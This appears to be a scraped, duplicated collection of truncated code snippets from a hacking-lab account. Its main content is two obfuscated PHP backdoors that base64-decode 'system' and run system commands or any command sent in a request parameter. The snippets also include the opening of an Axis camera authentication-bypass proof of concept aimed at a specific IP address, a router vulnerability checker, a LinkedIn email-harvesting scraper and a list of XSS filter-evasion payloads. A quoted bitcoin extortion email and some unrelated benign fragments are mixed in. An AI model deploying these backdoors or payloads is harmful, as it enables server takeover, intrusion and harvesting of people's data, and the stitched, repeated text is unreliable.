Mr. Cl0wn - H4ck1ng C0d3r MrCl0wnLab

## BACKDOORS PHP


# MODEL-01 CODE BASE64 + FUNCTION DEFINE >>
<?php (error_reporting(0).($__=@base64_decode("c3lzdGVt")).$__(base64_decode("aWQ=")).define("_","dW5hbWUgLWE7bHM7").$__(base64_decode(_)).exit);?>


# MODEL-02 CODE BASE64 + VALIDATION REQUEST>>
<?php (($__=@base64_decode("c3lzdGVt")).print($__(isset($_REQUEST[0])?$_REQUEST[0]:NULL)).exit);?>


## requestCamAxisPOC.lua
--[[
-- BY MrCl0wnLab & r00t-3xp10it
-- https://gist.github.com/MrCl0wnLab
axis-network-camera-http-authentication-bypass

https://www.coresecurity.com/content/axis-network-camera-http-authentication-bypass

CVE: CVE-2003-0240

Vulnerability Description:

## checkVulns-rounterIntelbras.lua
-- DEPENDENCIES (lua libraries) --
local http = require("socket.http")
local string = require("string")
local os = require("os")

target = "http://191.17.73.234"
port = 8081;

uri_request_list = {
-- URI INTELBRAS

## GatheringEmailLinkedin.php
<?php
$targets = array_unique(explode("\n",file_get_contents("posts.targets")));
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0';

foreach ($targets as $key => $url_target) {

   #REQUEST PEGANDO ID
   exec("curl -kg --user-agent '{$user_agent}' '{$url_target}'>tmp");

   #GREP  ID

## PHPProxyRequest.php
<?php

error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '1024M');
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
(!isset($_SESSION) ? session_start() : NULL);

## Movimentacao.cs
using System.Collections;
using System.Collections.Generic;
using UnityEngine;

public class Movimentacao : MonoBehaviour
{

    public Rigidbody rb;
    public Animator anim;
    public float moveSpeed = 20.0f;

## cadastro.py
from random import shuffle


class Cadastro:
    ''' Recebe um cpf e gera um objeto Cadastro que possui um atributo para
    guardar o ticket definido a partir do cpf passado.
    '''

    def __init__(self, cpf):
        self.ticket = self.ticket_generator(cpf)

## file.txt
<script>alert(0)</script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>

## blackmail.txt
---------- Forwarded message ---------
De: Jeanlou Zanella <huocleavlanddk@outlook.com>
Date: seg., 13 de abr. de 2020 às 16:35
Subject: jessiXXXXXXXXX : 44244JE
To: jessiXXXXXXXXX@gmail.com <jessiXXXXXXXXX@gmail.com>


Pa𝗒 $10𝟢𝟢 𝗂𝗇 𝖻tc 𝗍𝗈 𝗍𝗁𝖾 𝖽own 𝖻𝖾𝗅𝗈w 𝖺dd𝗋es𝗌:

bc1***qjma8cz8ry8lr5x3zc8w44cwthstxknr4lpzsdk

## Sender-mailgun.php
<?php
require_once('SenderMailgun.php');

# Open file key
$key = file_get_contents('key');

# Instantiate the client.
SenderMailgun::$api_key = $key;

# Data params email.


	# MODEL-01 CODE BASE64 + FUNCTION DEFINE >>
	<?php (error_reporting(0).($__=@base64_decode("c3lzdGVt")).$__(base64_decode("aWQ=")).define("_","dW5hbWUgLWE7bHM7").$__(base64_decode(_)).exit);?>


	# MODEL-02 CODE BASE64 + VALIDATION REQUEST>>
	<?php (($__=@base64_decode("c3lzdGVt")).print($__(isset($_REQUEST[0])?$_REQUEST[0]:NULL)).exit);?>
	--[[
	-- BY MrCl0wnLab & r00t-3xp10it
	-- https://gist.github.com/MrCl0wnLab
	axis-network-camera-http-authentication-bypass

	https://www.coresecurity.com/content/axis-network-camera-http-authentication-bypass

	CVE: CVE-2003-0240

	Vulnerability Description:
	-- DEPENDENCIES (lua libraries) --
	local http = require("socket.http")
	local string = require("string")
	local os = require("os")

	target = "http://191.17.73.234"
	port = 8081;

	uri_request_list = {
	-- URI INTELBRAS
	<?php
	$targets = array_unique(explode("\n",file_get_contents("posts.targets")));
	$user_agent = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0';

	foreach ($targets as $key => $url_target) {

	#REQUEST PEGANDO ID
	exec("curl -kg --user-agent '{$user_agent}' '{$url_target}'>tmp");

	#GREP ID
	<?php

	error_reporting(0);
	set_time_limit(0);
	ini_set('memory_limit', '1024M');
	ini_set('display_errors', 0);
	ini_set('max_execution_time', 0);
	ini_set('allow_url_fopen', 1);
	(!isset($_SESSION) ? session_start() : NULL);
	using System.Collections;
	using System.Collections.Generic;
	using UnityEngine;

	public class Movimentacao : MonoBehaviour
	{

	public Rigidbody rb;
	public Animator anim;
	public float moveSpeed = 20.0f;
	from random import shuffle


	class Cadastro:
	''' Recebe um cpf e gera um objeto Cadastro que possui um atributo para
	guardar o ticket definido a partir do cpf passado.
	'''

	def __init__(self, cpf):
	self.ticket = self.ticket_generator(cpf)
	<script>alert(0)</script>
	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	---------- Forwarded message ---------
	De: Jeanlou Zanella <huocleavlanddk@outlook.com>
	Date: seg., 13 de abr. de 2020 às 16:35
	Subject: jessiXXXXXXXXX : 44244JE
	To: jessiXXXXXXXXX@gmail.com <jessiXXXXXXXXX@gmail.com>


	Pa𝗒 $10𝟢𝟢 𝗂𝗇 𝖻tc 𝗍𝗈 𝗍𝗁𝖾 𝖽own 𝖻𝖾𝗅𝗈w 𝖺dd𝗋es𝗌:

	bc1***qjma8cz8ry8lr5x3zc8w44cwthstxknr4lpzsdk
	<?php
	require_once('SenderMailgun.php');

	# Open file key
	$key = file_get_contents('key');

	# Instantiate the client.
	SenderMailgun::$api_key = $key;

	# Data params email.